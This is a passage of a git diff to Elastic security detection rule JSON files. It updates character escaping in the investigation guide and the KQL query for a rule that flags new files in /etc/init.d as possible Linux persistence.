pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json index e6d25fa8647..7c7a7130b2b 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_5.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json index eddf6181c8c..de6ddc71024 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_6.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json index 3f454de3bab..5ed3325713f 100644 --- a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_7.json @@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data 